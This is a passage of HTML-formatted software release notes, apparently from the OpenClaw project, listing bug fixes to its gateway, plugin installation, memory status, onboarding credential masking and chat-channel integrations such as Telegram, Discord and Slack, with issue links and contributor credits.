<p>Gateway/macOS: stop <code>doctor</code> and LaunchAgent recovery from running <code>launchctl kickstart -k</code> after a fresh bootstrap, avoiding an immediate SIGTERM of the just-started gateway while still nudging already-loaded launchd jobs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370027099" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76261" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76261/hovercard" href="https://github.com/openclaw/openclaw/issues/76261">#76261</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/solosage1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/solosage1">@solosage1</a>.</p>
</li>
<li>
<p>Google Meet: route stateful CLI session commands through the gateway-owned runtime so joined realtime sessions survive after the starting CLI process exits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370516508" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76344" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76344/hovercard" href="https://github.com/openclaw/openclaw/issues/76344">#76344</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coltonharris-wq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coltonharris-wq">@coltonharris-wq</a>.</p>
</li>
<li>
<p>Memory/status: split builtin sqlite-vec store readiness from embedding-provider readiness in <code>memory status --deep</code> and <code>openclaw status</code>, so local vector-store failures no longer look like provider failures and provider failures no longer hide a healthy local vector store.</p>
</li>
<li>
<p>CLI/doctor: trust a ready gateway memory probe when CLI-side active memory backend resolution is unavailable, preventing false "No active memory plugin is registered" warnings for healthy runtime setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372247083" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76792" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76792/hovercard" href="https://github.com/openclaw/openclaw/issues/76792">#76792</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/som-686/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/som-686">@som-686</a>.</p>
</li>
<li>
<p>Memory/status: keep plain <code>openclaw memory status</code> and <code>openclaw memory status --json</code> on the cheap read-only path by reserving vector and embedding provider probes for <code>--deep</code> or <code>--index</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372172451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76769" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76769/hovercard" href="https://github.com/openclaw/openclaw/issues/76769">#76769</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daruire/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daruire">@daruire</a>.</p>
</li>
<li>
<p>Telegram: suppress stale same-session replies when a newer accepted message arrives before an older in-flight Telegram dispatch finalizes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371606977" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76642" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76642/hovercard" href="https://github.com/openclaw/openclaw/issues/76642">#76642</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: throttle repeated long-running active-work session warnings so healthy cron or subagent runs no longer print the same <code>recovery=none</code> line every heartbeat.</p>
</li>
<li>
<p>Gateway/diagnostics: keep non-blocking active-work and transient event-loop max-spike liveness diagnostics out of the default gateway console while preserving structured diagnostic events and warnings for queued, stalled, and recovery-eligible work.</p>
</li>
<li>
<p>Slack: collapse routine Socket Mode pong-timeout reconnects into one OpenClaw reconnect line and suppress the duplicate Slack SDK pong warning.</p>
</li>
<li>
<p>Gateway/diagnostics: abort-drain embedded runs after an extended no-progress stall so a single dead session no longer leaves queued Discord/channel turns blocked behind repeated <code>recovery=none</code> liveness warnings.</p>
</li>
<li>
<p>Plugins/ClawHub: accept the live artifact resolver <code>kind</code>/<code>sha256</code> field names alongside the typed <code>artifactKind</code>/<code>artifactSha256</code> form so <code>clawhub:</code> installs of npm-pack and legacy ZIP packages no longer miss downloadable artifacts. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RomneyDa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RomneyDa">@RomneyDa</a>.</p>
</li>
<li>
<p>Control UI/Sessions: avoid full <code>sessions.list</code> reloads for chat-turn <code>sessions.changed</code> payloads, so large session stores no longer add multi-second delays while chat responses are being delivered. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371812018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76676" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76676/hovercard" href="https://github.com/openclaw/openclaw/pull/76676">#76676</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/VACInc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/VACInc">@VACInc</a>.</p>
</li>
<li>
<p>Gateway/watch: run <code>doctor --fix --non-interactive</code> once and retry when the dev Gateway child exits during startup, so stale local plugin install/config state does not leave the tmux watch session disappearing without a repair attempt.</p>
</li>
<li>
<p>Doctor/Telegram: warn when selected Telegram quote replies can suppress <code>streaming.preview.toolProgress</code>, and document the <code>replyToMode</code> trade-off without changing runtime delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342354447" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73487" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73487/hovercard" href="https://github.com/openclaw/openclaw/issues/73487">#73487</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</p>
</li>
<li>
<p>Channels/Discord: send a best-effort native typing cue immediately after an inbound DM is accepted, so slow pre-dispatch turns show Discord liveness before queueing, context assembly, model, or tool work starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370775422" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76417" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76417/hovercard" href="https://github.com/openclaw/openclaw/issues/76417">#76417</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mlopez14/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mlopez14">@mlopez14</a>.</p>
</li>
<li>
<p>Plugins/install: reject source-only TypeScript package installs and installed plugin packages that are missing compiled runtime output, so broken npm artifacts fail at install/discovery time instead of falling through jiti and surfacing later as unavailable providers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4372027509" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76720" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76720/hovercard" href="https://github.com/openclaw/openclaw/issues/76720">#76720</a>.</p>
</li>
<li>
<p>Plugins/config: deduplicate identical manifest compatibility diagnostics when an explicitly configured plugin overrides another discovered candidate, so external channel plugins do not print the same missing <code>channelConfigs</code> warning repeatedly during install and enable. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/status: honor explicit <code>messages.statusReactions.enabled: true</code> in tool-only guild channels so queued ack reactions can progress through thinking/done lifecycle reactions instead of stopping at the initial emoji. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvinthebored/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvinthebored">@Marvinthebored</a>.</p>
</li>
<li>
<p>Discord/native commands: compare Discord-normalized slash-command descriptions and localized descriptions during reconcile so CJK or multiline command text no longer triggers redundant startup PATCH bursts and rate-limit 429s. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371364237" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76587" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76587/hovercard" href="https://github.com/openclaw/openclaw/issues/76587">#76587</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhengsx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhengsx">@zhengsx</a>.</p>
</li>
<li>
<p>Agents/OpenAI: omit Chat Completions <code>reasoning_effort</code> for <code>gpt-5.4-mini</code> only when function tools are present while preserving tool-free Chat and Responses reasoning support, preventing Telegram-routed fallback runs from hanging after OpenAI rejects tool payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4369566121" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76176" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76176/hovercard" href="https://github.com/openclaw/openclaw/issues/76176">#76176</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ThisIsAdilah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ThisIsAdilah">@ThisIsAdilah</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</p>
</li>
<li>
<p>Telegram: reuse the successful startup <code>getMe</code> probe for grammY polling startup and continue into <code>getUpdates</code> after recoverable <code>deleteWebhook</code> cleanup failures, reducing high-latency Bot API control-plane calls before long polling starts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370661964" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76388" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76388/hovercard" href="https://github.com/openclaw/openclaw/issues/76388">#76388</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jackiedepp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jackiedepp">@jackiedepp</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: merge session id/key aliases in diagnostic session state and activity tracking so completed runs no longer leave stale queued work behind that keeps liveness samples at warning level.</p>
</li>
<li>
<p>Agents/models: forward model <code>maxTokens</code> as the default output-token limit for OpenAI-compatible Responses and Completions transports when no runtime override is provided, preventing provider defaults from silently truncating larger outputs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371660728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76645" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76645/hovercard" href="https://github.com/openclaw/openclaw/pull/76645">#76645</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeyfrasier/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeyfrasier">@joeyfrasier</a>.</p>
</li>
<li>
<p>macOS CLI/onboarding: honor sensitive wizard text steps in <code>openclaw-mac wizard</code> with termios no-echo input, suppressing saved credential previews while preserving long API keys and gateway tokens. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371933405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76698" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76698/hovercard" href="https://github.com/openclaw/openclaw/issues/76698">#76698</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anurag-bg-neu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anurag-bg-neu">@anurag-bg-neu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sallyom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sallyom">@sallyom</a>.</p>
</li>
<li>
<p>Control UI/Skills: fix skill detail modal silently failing to open in all browsers by deferring <code>showModal()</code> until the dialog element is connected to the DOM; the Lit <code>ref</code> callback fired before connection causing a <code>DOMException: HTMLDialogElement.showModal: Dialog element is not connected</code> on every skill click. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nickmopen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nickmopen">@nickmopen</a>.</p>
</li>
<li>
<p>Gateway/update: run <code>doctor --non-interactive --fix</code> after Control UI global package updates before reporting success, so legacy config is migrated before the gateway restart. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stevenchouai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stevenchouai">@stevenchouai</a>.</p>
</li>
<li>
<p>Gateway/cron: stop a lazy cron startup that loses a hot-reload race, preventing the old cron service from starting after reload has already replaced cron state.</p>
</li>
<li>
<p>CLI/plugins: warn when npm plugin installs remain shadowed by a failing config-selected source and surface the repair path in <code>plugins doctor</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LindalyX-Lee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LindalyX-Lee">@LindalyX-Lee</a>.</p>
</li>
<li>
<p>Agents/Telegram: preserve explicit reply and quote context in embedded model prompts without letting quoted text drive prompt-local image loading. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370779315" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76419" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76419/hovercard" href="https://github.com/openclaw/openclaw/issues/76419">#76419</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371728761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76659" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76659/hovercard" href="https://github.com/openclaw/openclaw/pull/76659">#76659</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cheechnd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cheechnd">@cheechnd</a>.</p>
</li>
<li>
<p>Active Memory: apply <code>setupGraceTimeoutMs</code> to the embedded recall runner as well as the outer prompt-build watchdog, so very-cold first recalls keep the configured setup grace end-to-end. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352275748" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74480" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74480/hovercard" href="https://github.com/openclaw/openclaw/pull/74480">#74480</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/volcano303/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/volcano303">@volcano303</a>.</p>
</li>
<li>
<p>Channels/Feishu: cap how long the per-chat sequential queue blocks subsequent same-key tasks behind a single in-flight task (5 min default), so a single hung dispatch no longer leaves later same-chat messages in <code>queued</code> state until gateway restart; the stuck task continues running but is evicted from the blocking chain and a warning is logged. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308531730" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70133" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70133/hovercard" href="https://github.com/openclaw/openclaw/issues/70133">#70133</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371855669" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76687" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76687/hovercard" href="https://github.com/openclaw/openclaw/pull/76687">#76687</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bek91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bek91">@bek91</a>.</p>
</li>
<li>
<p>Active Memory: skip scoped Telegram forum-topic conversation ids (containing <code>:</code>) when resolving the embedded recall run channel, falling back to <code>messageProvider</code> instead, so Active Memory no longer throws a bundled-plugin dirName validation error in forum-topic sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371944266" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76704" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76704/hovercard" href="https://github.com/openclaw/openclaw/issues/76704">#76704</a>.</p>
</li>
<li>
<p>Agents/tools: defer automatic PDF model/auth resolution until the PDF tool is used, keeping agent-turn tool prep from probing auth profiles on messages without PDFs while preserving explicit PDF model registration. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371647356" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76644" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76644/hovercard" href="https://github.com/openclaw/openclaw/issues/76644">#76644</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>CLI/config: keep JSON dry-run patches validating touched channel configuration against bundled channel schemas even when the patch only contains SecretRef objects.</p>
</li>
<li>
<p>Plugins/tools: keep disabled bundled tool plugins out of explicit runtime allowlist ownership and fall back from loaded-but-empty channel registries to tool-bearing plugin registries, so Active Memory can use bundled <code>memory-core</code> search/get tools even when <code>memory-lancedb</code> is disabled. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371441459" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76603" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76603/hovercard" href="https://github.com/openclaw/openclaw/issues/76603">#76603</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jwong-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jwong-art">@jwong-art</a>.</p>
</li>
<li>
<p>Plugins/install: run <code>npm install</code> from the managed npm-root manifest so installing one <code>@openclaw/*</code> plugin preserves already installed sibling plugins instead of pruning them. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371289667" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76571" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76571/hovercard" href="https://github.com/openclaw/openclaw/issues/76571">#76571</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371440891" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76602" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76602/hovercard" href="https://github.com/openclaw/openclaw/pull/76602">#76602</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/byungskers/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/byungskers">@byungskers</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/crpol/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/crpol">@crpol</a>.</p>
</li>
<li>
<p>Plugins/context-engine: include the selected <code>plugins.slots.contextEngine</code> plugin in the gateway startup load plan so external context-engine plugins without <code>activation.onStartup</code> in their manifest are loaded before any agent turn resolves the active engine; prevents the "Context engine X is not registered; falling back to default engine legacy" warning after gateway startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371302001" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76576" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76576/hovercard" href="https://github.com/openclaw/openclaw/issues/76576">#76576</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/tools: restore on-demand registry load for path-based plugins (origin "config") so tool factories registered via <code>plugins.load.paths</code> are resolved at agent request time when no pre-warmed channel registry is present; prevents "unknown method" errors after gateway startup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371431770" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76598" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76598/hovercard" href="https://github.com/openclaw/openclaw/issues/76598">#76598</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Plugins/hooks: include explicitly enabled hook-capable plugins in the Gateway startup runtime scope so embedded PI runs can see their <code>before_prompt_build</code> and <code>agent_end</code> hooks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371680261" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76649" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76649/hovercard" href="https://github.com/openclaw/openclaw/issues/76649">#76649</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wwf3045/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wwf3045">@wwf3045</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MkDev11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MkDev11">@MkDev11</a>.</p>
</li>
<li>
<p>Plugins/OpenCode: expose Claude thinking profiles through the lightweight provider policy surface so directive and session validation keep <code>xhigh</code>, <code>adaptive</code>, and <code>max</code> for <code>opencode/claude-opus-4-7</code> instead of remapping <code>xhigh</code> to <code>high</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371666992" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76648" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76648/hovercard" href="https://github.com/openclaw/openclaw/issues/76648">#76648</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aaajiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aaajiao">@aaajiao</a>.</p>
</li>
<li>
<p>Channels/QQ Bot: resolve structured <code>clientSecret</code> SecretRefs before QQ token exchange, expose the QQ Bot secret contract to secrets tooling, and reject legacy <code>secretref:/...</code> marker strings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355033110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74772" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74772/hovercard" href="https://github.com/openclaw/openclaw/pull/74772">#74772</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xialonglee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xialonglee">@xialonglee</a>.</p>
</li>
<li>
<p>Agents: keep active streamed provider replies alive by refreshing guarded fetch timeouts on raw body chunks and surface true prompt stream timeouts as explicit errors instead of partial assistant fragments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370351854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76307" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76307/hovercard" href="https://github.com/openclaw/openclaw/issues/76307">#76307</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371560110" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76633" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76633/hovercard" href="https://github.com/openclaw/openclaw/pull/76633">#76633</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MkDev11/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MkDev11">@MkDev11</a>.</p>
</li>
<li>
<p>Plugins/externalization: keep official ACPX, Google Chat, and LINE install specs on production package names, leaving beta-tag probing to the explicit OpenClaw beta update channel. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/doctor: keep missing-plugin repair from overriding official catalog metadata with runtime fallbacks, so ACPX repairs preserve the official npm spec during the externalization rollout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/doctor: match stale bundled-plugin install records by exact parsed package name so doctor does not remove external npm or ClawHub records that only share an OpenClaw package-name prefix.</p>
</li>
<li>
<p>Plugins/catalog: preserve ClawHub install specs when generating the packaged channel catalog so future storepack-first channel plugins keep their remote source instead of becoming npm-only. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/catalog: pin bare npm specs from prerelease external channel catalog entries to the catalog entry version, so beta catalogs do not silently install the latest stable package.</p>
</li>
<li>
<p>Plugins/update: treat catalog-matched official npm updates and OpenClaw-authored externalized-bundled npm bridges as trusted official installs so launch-code plugins can update or migrate out of the bundled tree without scanner false positives. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/onboarding: fall back from ClawHub to npm only for missing package/version errors, keeping integrity and verification failures fail-closed during storepack rollout. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>CLI/onboarding: mask credential inputs (model-auth provider API keys, gateway tokens and passwords, web-search provider keys, and skill env-var values) in the interactive <code>openclaw onboard</code> wizard so pasted secrets no longer echo into terminal scrollback, <code>Start-Transcript</code> logs, or screenshots; existing tokens/passwords are preserved through a masked-preview confirm step before the sensitive prompt. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anurag-bg-neu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anurag-bg-neu">@anurag-bg-neu</a>.</p>
</li>
<li>
<p>Control UI/Talk: fix Talk (OpenAI Realtime WebRTC) CORS failure by stripping server-side-only attribution headers (<code>originator</code>, <code>version</code>, <code>User-Agent</code>) from browser offer headers; <code>api.openai.com/v1/realtime/calls</code> only allows <code>authorization</code> and <code>content-type</code> in its CORS preflight, so forwarding these headers caused the browser SDP exchange to fail. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4370828107" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76435" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76435/hovercard" href="https://github.com/openclaw/openclaw/issues/76435">#76435</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</p>
</li>
<li>
<p>Chat delivery: make <code>/verbose on|full|off</code> changes affect subsequent tool-use chat bubbles again, including channels with draft preview tool progress enabled, while preserving one-shot verbose directives.</p>
</li>
<li>
